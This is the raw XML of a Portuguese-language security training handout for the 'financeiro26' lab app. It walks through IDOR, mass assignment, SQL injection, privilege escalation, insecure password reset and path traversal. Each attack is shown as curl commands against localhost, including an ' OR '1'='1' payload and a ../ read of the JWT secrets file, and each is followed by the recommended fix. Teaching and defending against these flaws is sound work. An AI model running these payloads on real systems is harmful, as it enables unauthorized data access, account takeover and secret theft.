      <w:pPr>
        <w:shd w:fill="C0392B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ALTA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área de Lançamentos (/lancamento) já é diferente das anteriores: exige um token válido (não está na lista permitAll de ConfiguracaoSeguranca.java). Mas "exigir login" só decide QUEM pode entrar — não decide O QUE essa pessoa pode fazer depois de entrar. Este laboratório mostra que as regras de negócio do formulário (Lancamentos.jsx) não existem em LancamentoService.java.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 React, a função validarNoFrontend() bloqueia duas coisas antes de enviar: (1) valor precisa ser maior que zero; (2) uma despesa não pode ultrapassar o saldo disponível. No backend, LancamentoService.inserir() salva o que chegar, sem checar nada disso.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1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Pelo frontend, logado como Usuario Teste Um, tente cadastrar uma despesa maior que o seu saldo — confirme que o formulário bloqueia com a mensagem "Saldo insuficiente".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Agora envie a MESMA operação direto para a API, com o TOKEN_A (pulando o formulário inteiramente):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http://localhost:8081/lancamento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$TOKEN_A"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'{"descricao":"Compra nao autorizada pelo front","valor":999999,"tipo":"DESPESA","data":"2026-01-01"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Recarregue a página de Lançamentos — o registro aparece normalmente na lista e o saldo fica negativo, algo que o formulário nunca permitiria criar sozinho.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Vá além: envie uma "receita" com valor negativo — o backend aceita igual, mesmo sendo logicamente absurdo para o tipo informado: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http://localhost:8081/lancamento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$TOKEN_A"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'{"descricao":"Receita negativa","valor":-500,"tipo":"RECEITA","data":"2026-01-01"}'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Por que isso é tão comum em aplicações reais?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validar no frontend dá um retorno instantâneo pro usuário (boa experiência) e é tentador achar que, já que "ninguém vai usar o Postman", não precisa repetir a checagem no backend. Mas o frontend roda no computador do próprio usuário — ele pode inspecionar, pausar e reescrever qualquer requisição antes dela sair, com ferramentas gratuitas e nativas do navegador (a aba Network já permite "Copy as cURL" e reenviar alterado).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toda regra que existe em validarNoFrontend() precisa de uma equivalente em LancamentoService.inserir()/alterar(): @Positive (ou @DecimalMin) no campo valor da entidade, e uma checagem de saldo calculada no servidor (somando os lançamentos do próprio usuário autenticado) antes de salvar uma despesa. Regra de negócio no frontend é UX; a mesma regra no backend é segurança — as duas são necessárias, nunca uma no lugar da outra.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12 — IDOR na área logada: acessando dados de outro usuário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A01 — Broken Access Control (API1:2023 Broken Object Level Authorization)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="8C1C1C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CRÍTICA  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:left w:val="single" w:color="C94F4F" w:sz="18" w:space="8"/>
          <w:right w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="FBE1E1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8C1C1C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Este é o laboratório mais importante para desmontar uma crença comum:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6B1414"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">"a rota pede token, então está protegida". Aqui, QUALQUER usuário autenticado consegue ler, alterar e apagar lançamentos de QUALQUER outro usuário — só precisa saber o id.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GET /lancamento (a listagem) filtra corretamente pelo dono, em LancamentoService.listarMeusLancamentos() — usa o AuthUsuarioProvider para descobrir quem está logado e busca só os lançamentos dele. Só que buscarPorId(), alterar() e remover() nunca fazem essa mesma checagem — eles buscam o lançamento só pelo id, ignorando de quem é o token usado na chamada.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15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Logado como Usuario Teste Um (TOKEN_A), cadastre um lançamento pelo frontend e anote o id dele (aparece nas ferramentas de rede do navegador, na resposta do POST).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Faça login como Usuario Teste Dois e capture o TOKEN_B.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Como Usuario Teste Dois, leia o lançamento que pertence ao Usuario Teste Um (troque 5 pelo id anotado):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http://localhost:8081/lancamento/5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$TOKEN_B"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funciona: devolve descrição, valor e tipo do lançamento de OUTRA pessoa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Ainda como Usuario Teste Dois, altere esse mesmo lançamento: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PUT http://localhost:8081/lancamento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$TOKEN_B"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'{"id":5,"descricao":"Adulterado por outro usuario","valor":1,"tipo":"DESPESA","data":"2026-01-01"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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E, para fechar, apague o lançamento da vítima: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DELETE http://localhost:8081/lancamento/5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$TOKEN_B"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Volte ao frontend como Usuario Teste Um: o lançamento sumiu (ou foi alterado), sem que ele tenha feito nada — e sem nenhum erro em nenhum momento do ataque.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Por que a listagem "engana"?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quem testa só pelo frontend nunca vê o problema, porque GET /lancamento (a única chamada que a tela de listagem usa) está corretamente filtrada. As três rotas quebradas (buscarPorId, alterar, remover) só aparecem se alguém testar a API diretamente — e é exatamente por isso que este tipo de falha (conhecida como Broken Object Level Authorization, o item #1 do OWASP API Security Top 10) é tão comum em produção: passa despercebida em qualquer teste manual pela tela.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em LancamentoService, criar um método privado validarDono(Lancamento lancamento) que compara lancamento.getUsuario().getId() com authUsuarioProvider.getUsuarioAutenticado().getId(), lançando um erro (404 ou 403) se forem diferentes — e chamar esse método dentro de buscarPorId(), alterar() e remover(), logo após buscar o registro. A regra é: toda vez que um id vem do cliente, pergunte "de quem é isso, e é a mesma pessoa que está pedindo?".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13 — Mass assignment: lançamento na conta de outra pessoa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A01 — Broken Access Control / A08 — Software and Data Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="C0392B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ALTA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LancamentoService.inserir() tenta "ajudar": se o corpo da requisição já vier com um usuario preenchido, ele usa esse usuário como dono; só cai no autenticado quando o campo vem vazio. Isso inverte a lógica correta — o dono de um lançamento NUNCA deveria ser uma escolha do cliente, deveria ser sempre o autenticado, sem exceção.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16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Descubra o id de Usuario Teste Dois (reaproveitando o Laboratório 2: GET /usuario lista todo mundo, mesmo sem token).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Logado como Usuario Teste Um (TOKEN_A), crie um lançamento indicando outro dono no corpo da requisição (troque 2 pelo id de Usuario Teste Dois):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http://localhost:8081/lancamento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$TOKEN_A"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'{"descricao":"Gasto plantado por outra conta","valor":3000,"tipo":"DESPESA","data":"2026-01-01","usuario":{"id":2}}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Faça login como Usuario Teste Dois e confira a tela de Lançamentos: o registro criado por Usuario Teste Um aparece lá, como se Usuario Teste Dois mesmo tivesse cadastrado — porque GET /lancamento (Laboratório 12) filtra pelo dono salvo no banco, e o dono salvo foi forjado nesta etapa.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Isso é o mesmo problema do Laboratório 3, ou é diferente?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é a mesma FAMÍLIA de falha (o cliente decide algo que só o servidor deveria decidir), mas um mecanismo diferente: lá, o próprio id de um Usuario existente era sobrescrito; aqui, um Lancamento novo nasce com o dono errado. Vale mostrar aos alunos que a mesma lição ("nunca confie em quem/o quê o cliente diz que algo pertence") se aplica em pontos diferentes do sistema.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em LancamentoService.inserir(), remover completamente o if/else que aceita um usuario vindo do corpo da requisição — trocar por uma única linha, sempre executada: lancamento.setUsuario(authUsuarioProvider.getUsuarioAutenticado()). Se um dia for necessário um recurso "criar lançamento para outro usuário" (ex.: um contador cadastrando em nome de um cliente), isso deve ser um endpoint separado, exigindo um perfil ADMIN explícito — nunca inferido silenciosamente de um campo opcional do JSON.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14 — Injeção de SQL na busca de lançamentos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A03 — Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="8C1C1C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CRÍTICA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GET /lancamento/buscar?descricao=... existe para o usuário procurar seus próprios lançamentos pelo texto da descrição. Em LancamentoService.buscarPorDescricao(), a consulta é montada por concatenação de texto Java direto em SQL nativo, em vez de usar um parâmetro vinculado (?1, :termo) como o resto do projeto faz (compare com UsuarioRepository.findByEmail, uma query derivada 100% parametrizada).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String sql = "SELECT * FROM lancamento WHERE id_usuario = " + usuarioLogado.getId()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+ " AND descricao LIKE '%" + termo + "%'";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Query query = entityManager.createNativeQuery(sql, Lancamento.class);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texto digitado pelo usuário ("termo") vira parte literal do comando SQL — o banco não tem como distinguir "texto de busca" de "comando SQL", porque os dois chegam misturados na mesma string.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17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Logado como Usuario Teste Um (TOKEN_A), busque normalmente por uma palavra qualquer e confirme que só aparecem lançamentos dele mesmo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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Agora, em vez de uma palavra de busca normal, envie este valor como parâmetro descricao (o --data-urlencode do curl cuida de codificar os caracteres especiais para a URL):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-G http://localhost:8081/lancamento/buscar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$TOKEN_A"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--data-urlencode "descricao=' OR '1'='1' #"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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Observe que a resposta traz os lançamentos de TODOS os usuários do sistema — não só os de Usuario Teste Um.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Como esse texto "quebra" a consulta?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a query final montada fica: SELECT * FROM lancamento WHERE id_usuario = 3 AND descricao LIKE '%' OR '1'='1' #%'. O caractere # inicia um comentário no MySQL (o resto da linha é ignorado), e por precedência de operadores AND tem prioridade sobre OR — então a condição vira "(id_usuario = 3 AND descricao LIKE algo) OR ('1'='1')". Como '1'='1' é sempre verdadeiro, o OR faz a cláusula inteira aceitar TODAS as linhas da tabela, de qualquer usuário — a injeção não só vaza dados, como derruba exatamente o filtro de dono que o código tentava aplicar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:left w:val="single" w:color="C94F4F" w:sz="18" w:space="8"/>
          <w:right w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="FBE1E1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8C1C1C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Por que isso é classificado como CRÍTICA, e não só ALTA como o Laboratório 12?  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6B1414"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">porque o mesmo mecanismo (SQL Injection) não se limita a ler dados — dependendo do banco e das permissões da conexão, o mesmo tipo de falha pode ser usado para alterar ou apagar dados de qualquer tabela, ou mesmo executar comandos administrativos. Aqui o exemplo fica no vazamento de leitura para manter o laboratório seguro e reversível, mas a classe de vulnerabilidade permite muito mais.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nunca concatenar entrada do usuário dentro de uma string SQL. A correção é trocar a query nativa por uma consulta parametrizada — com JPQL (@Query("SELECT l FROM Lancamento l WHERE l.usuario = :usuario AND l.descricao LIKE %:termo%")) ou, melhor ainda, um método derivado do Spring Data (findByUsuarioAndDescricaoContaining(usuario, termo)), deixando o Spring Data JPA parametrizar o valor com segurança — o mesmo padrão que UsuarioRepository.findByEmail já usa.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15 — Escalonamento de privilégio: virando ADMIN sozinho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A01 — Broken Access Control (API5:2023 Broken Function Level Authorization)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="8C1C1C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CRÍTICA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projeto já tem @EnableMethodSecurity(prePostEnabled = true) em ConfiguracaoSeguranca.java e um novo endpoint administrativo, GET /lancamento/todos, protegido com @PreAuthorize("hasAuthority('ADMIN')") — ele deveria listar os lançamentos de todo mundo só para quem tem o perfil ADMIN. O problema não está nessa checagem em si (ela funciona), e sim em como alguém consegue CONSEGUIR o perfil ADMIN: UsuarioService.alterar() aceita um campo usuarioPerfil no corpo do PUT /usuario e simplesmente troca os perfis do usuário por quaisquer perfis que o cliente mandar — sem checar se quem está chamando já é administrador.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18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Descubra o id do perfil ADMIN: GET /perfil está liberado (permitAll), então qualquer um consegue listar os perfis existentes e seus ids (UUID).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http://localhost:8081/perfil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Logado como um usuário comum (TOKEN_A), confirme que GET /lancamento/todos nega o acesso (403) — como esperado, ele ainda não é ADMIN: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http://localhost:8081/lancamento/todos -H "Authorization: Bearer $TOKEN_A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Agora, com o MESMO TOKEN_A, altere o próprio usuário se autoconcedendo o perfil ADMIN (troque o id do usuário e o id-do-perfil-admin pelos valores reais):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PUT http://localhost:8081/usuario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$TOKEN_A"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'{"id":1,"nome":"Usuario Teste Um","email":"teste1@exemplo.com",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"usuarioPerfil":[{"perfil":{"id":"id-do-perfil-admin"}}]}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Faça logout e login de novo (o access token antigo não carrega os novos perfis — um token novo, sim, já que JwtFiltroAutenticacao recarrega as autorities do banco a cada requisição). Repita a chamada do passo 2: agora GET /lancamento/todos funciona, trazendo os lançamentos de TODOS os usuários.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Por que precisa logar de novo, se as autorities são recarregadas do banco a cada requisição?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boa observação para discutir em aula: como o material de JWT explica (seção 8), o UserDetails é recarregado do banco a cada chamada — então, na verdade, nem precisaria de um token novo, a MESMA sessão já passaria a valer como ADMIN na requisição seguinte. Peça aos alunos para testar sem gerar um token novo e confirmar isso na prática.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UsuarioService.alterar() nunca deveria aceitar mudanças de perfil vindas de um PUT genérico de "editar meus dados". A concessão de perfis precisa ser um endpoint separado (ex.: POST /usuario/{id}/perfil), protegido com @PreAuthorize("hasAuthority('ADMIN')") — assim, só quem já é administrador consegue tornar alguém administrador. É o mesmo princípio do Laboratório 13: nunca inferir uma decisão sensível de um campo opcional do corpo da requisição.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16 — Recuperação de senha insegura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A07 — Identification and Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="C0392B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ALTA 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RecuperacaoSenhaService concentra três falhas clássicas desse tipo de fluxo, todas no mesmo lugar — um bom laboratório para juntar tudo que já foi visto sobre autenticação.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19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Solicite a recuperação de senha de um usuário de teste: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http://localhost:8081/autenticacao/recuperar-senha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'{"email":"vitima@exemplo.com"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Observe a resposta: ela já traz o campo "token" — o código de recuperação que deveria chegar só por e-mail. Sem nunca acessar a caixa de entrada da vítima, use esse valor no próximo passo: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http://localhost:8081/autenticacao/redefinir-senha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'{"email":"vitima@exemplo.com","token":"123456","novaSenha":"SenhaDoAtacante"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Faça login com vitima@exemplo.com e SenhaDoAtacante — funciona: a conta foi sequestrada sem nunca comprometer o e-mail de verdade da vítima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Repita o passo 2 usando o MESMO código (troque a senha de novo, para outra coisa) — funciona de novo. O código nunca é invalidado após o uso.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E se o token não tivesse vazado na resposta?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mesmo assim, o código é só um número de 6 dígitos gerado com java.util.Random (não SecureRandom) — 900 mil combinações possíveis. Combinado com a falta de limite de tentativas do Laboratório 6, um script simples testando POST /autenticacao/redefinir-senha em loop encontraria um código válido em minutos, mesmo sem esse vazamento na resposta.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três ajustes independentes, um para cada falha: (1) nunca devolver o token na resposta da API — ele deve viajar só pelo canal fora de banda (e-mail); (2) gerar o token com SecureRandom, e considerar um token mais longo (ex.: UUID, como o refresh token já faz); (3) marcar o registro como usado (ou apagá-lo) assim que a senha for redefinida com sucesso, e rejeitar qualquer tentativa de reuso.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Laboratório 17 — Path traversal no upload/download de comprovantes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Categoria OWASP relacionada: A01 — Broken Access Control (Path Traversal)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="8C1C1C" w:color="auto" w:val="clear"/>
        <w:spacing w:after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SEVERIDADE: CRÍTICA  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:left w:val="single" w:color="C94F4F" w:sz="18" w:space="8"/>
          <w:right w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="FBE1E1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8C1C1C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Este laboratório usa path traversal para ler, de dentro da própria aplicação, o arquivo application-secrets.properties — o mesmo arquivo com o jwt.secret discutido inteiro no material de JWT (seção 7).  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6B1414"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">É o encerramento perfeito do curso: mostra o que acontece quando o segredo mais protegido do sistema fica a um "../" de distância de um endpoint mal validado.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POST /lancamento/{id}/comprovante salva o arquivo enviado usando o nome original do cliente (arquivo.getOriginalFilename()), sem sanitizar. GET /lancamento/comprovante?arquivo=... devolve qualquer arquivo dentro da pasta uploads — só que usa Path.resolve(arquivo).normalize(), e normalize() apenas limpa a sintaxe de "../" no caminho, sem checar se o resultado final ainda está DENTRO da pasta uploads.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A83A3A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20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Logado (qualquer TOKEN_A serve — o endpoint só exige estar autenticado, não checa mais nada), tente ler o arquivo de segredos do backend a partir da pasta de uploads:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top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-G http://localhost:8081/lancamento/comprovante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"Authorization: Bearer $TOKEN_A"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--data-urlencode "arquivo=../src/main/resources/application-secrets.properties" \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-o secredo_roubado.properties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pBdr>
          <w:left w:val="single" w:color="D9D9D9" w:sz="12" w:space="6"/>
          <w:right w:val="single" w:color="D9D9D9" w:sz="6" w:space="4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cat secredo_roubado.properties</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D9D9D9" w:sz="6" w:space="4"/>
          <w:left w:val="single" w:color="D9D9D9" w:sz="12" w:space="6"/>
          <w:right w:val="single" w:color="D9D9D9" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="20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jwt.secret=... aparece em texto puro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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Se o backend estiver rodando a partir da pasta backend/ (padrão do mvnw spring-boot:run), o caminho relativo uploads/../src/main/resources/... resolve exatamente para o arquivo real do projeto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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(Opcional) No sentido inverso — escrita: anexe um comprovante pelo frontend usando um arquivo cujo nome você renomeou para conter ../ (ex.: ../../teste-escrita.txt antes de selecionar) e confirme que ele é gravado fora da pasta uploads.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Por que normalize() não é suficiente?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Paths.get("uploads").resolve("../src/...").normalize() devolve um caminho sintaticamente "limpo" (sem ../ sobrando), mas nada impede que esse caminho limpo aponte para FORA de uploads — normalize() arruma a forma do caminho, não decide se o destino é permitido. É um erro real e comum: times acham que normalize() "resolve" o path traversal, quando na verdade só prepara o caminho para a checagem que ainda falta ser escrita.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="4E9F5A" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="4E9F5A" w:sz="4" w:space="4"/>
          <w:left w:val="single" w:color="4E9F5A" w:sz="18" w:space="8"/>
          <w:right w:val="single" w:color="4E9F5A" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="E3F2E6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2A5E33"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correção recomendada  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F4526"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">depois do normalize(), validar explicitamente que o caminho final ainda começa pelo diretório base: caminho.startsWith(Paths.get(UPLOAD_DIR).toAbsolutePath().normalize()) — rejeitando (403/400) qualquer resultado que escape da pasta. No upload, gerar um nome de arquivo novo no servidor (ex.: um UUID + extensão validada por uma lista de permissões) em vez de reaproveitar o nome original enviado pelo cliente, e limitar o tamanho do arquivo aceito.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Resumo: prioridade de correção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 o objetivo for corrigir o financeiro26 de verdade (não só usá-lo como laboratório), esta é a ordem sugerida, da mais urgente para a mais opcional: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200"/>
        <w:gridCol w:w="2100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="8C2A2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200"/>
            <w:shd w:fill="8C2A2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Falha</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="8C2A2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Severidade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
            <w:shd w:fill="8C2A2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Esforço de correção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17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Path traversal no upload/download de comprovantes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CRÍTICA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validar diretório final + renomear arquivo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14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SQL Injection em GET /lancamento/buscar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CRÍTICA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trocar por query parametrizada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15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Escalonamento de privilégio via PUT /usuario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CRÍTICA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endpoint de perfil separado, só p/ ADMIN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Sequestro de conta via mass assignment (POST /usuario)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CRÍTICA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criar um DTO de cadastro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12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IDOR em /lancamento/{id}, /lancamento (PUT/DELETE)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CRÍTICA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checar dono antes de agir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XSS armazenado em AdminLancamentos.jsx (dangerouslySetInnerHTML)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CRÍTICA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voltar para {descricao}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Listagem de usuários sem autenticação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ALTA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ajustar ConfiguracaoSeguranca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11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Regras de negócio de Lançamentos só no frontend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ALTA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@Positive + checagem de saldo no service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13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Mass assignment do dono em POST /lancamento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ALTA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remover o if/else, usar sempre o autenticado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16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Recuperação de senha insegura (token vaza, previsível, reutilizável)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ALTA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3 ajustes pontuais no service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Sem limite de tentativas (login e cadastro)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MÉDIA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Médio — rate limiting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E-mail duplicado quebra o login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MÉDIA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unique + validação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Access token não revogável no logout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MÉDIA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Alto — exige denylist/estado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Sem política mínima de senha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Baixo — anotações de validação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1, 9, 10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Informativos (JWT legível, CSRF e CORS já protegidos)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INFORMATIVA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Nenhum — já corretos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pBdr>
          <w:bottom w:val="single" w:color="8C2A2A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8C2A2A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Mapeamento para o OWASP Top 10 (2021)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shd w:fill="8C2A2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Categoria OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6700"/>
            <w:shd w:fill="8C2A2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Laboratórios relacionados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A01 — Broken Access Control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Laboratório 2 (IDOR), Laboratório 3 (mass assignment), Laboratório 9 (CSRF), Laboratório 12 (IDOR/BOLA em Lançamentos), Laboratório 13 (mass assignment), Laboratório 15 (escalonamento de privilégio), Laboratório 17 (path traversal)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A02 — Cryptographic Failures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Laboratório 1 (JWT legível)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A03 — Injection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Laboratório 5 (XSS simulado), Laboratório 14 (SQL Injection)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A04 — Insecure Design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Laboratório 8 (e-mail duplicado), Laboratório 11 (regra de negócio só no frontend)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A05 — Security Misconfiguration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Laboratório 5 (falta de CSP), Laboratório 10 (CORS)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A07 — Identification and Authentication Failures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Laboratório 4 (replay), Laboratório 6 (força bruta), Laboratório 7 (senha fraca), Laboratório 16 (recuperação de senha insegura)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A08 — Software and Data Integrity Failures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Laboratório 3 (mass assignment), Laboratório 13 (mass assignment em Lançamentos)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top w:val="single" w:color="E8C547" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="E8C547" w:sz="4" w:space="4"/>
          <w:left w:val="single" w:color="E8C547" w:sz="18" w:space="8"/>
          <w:right w:val="single" w:color="E8C547" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="FFF4CE" w:color="auto" w:val="clear"/>
        <w:spacing w:after="240" w:before="120" w:line="28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Sugestão de uso em aula:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="594100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">apresente cada laboratório como uma investigação — peça para os alunos preverem o resultado antes de rodar o comando, depois comparem com o que realmente aconteceu. Encerre cada um perguntando "o que exatamente no código permitiu isso?" antes de revelar a correção.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="BFBFBF" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="260" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="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Material preparado a partir do código atual do projeto financeiro26, como complemento ao guia de Autenticação e Autorização com JWT.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20"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="21"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="22"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="23"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="24"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="20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2026-09-11T15:30:37.261Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-11T15:30:37.262Z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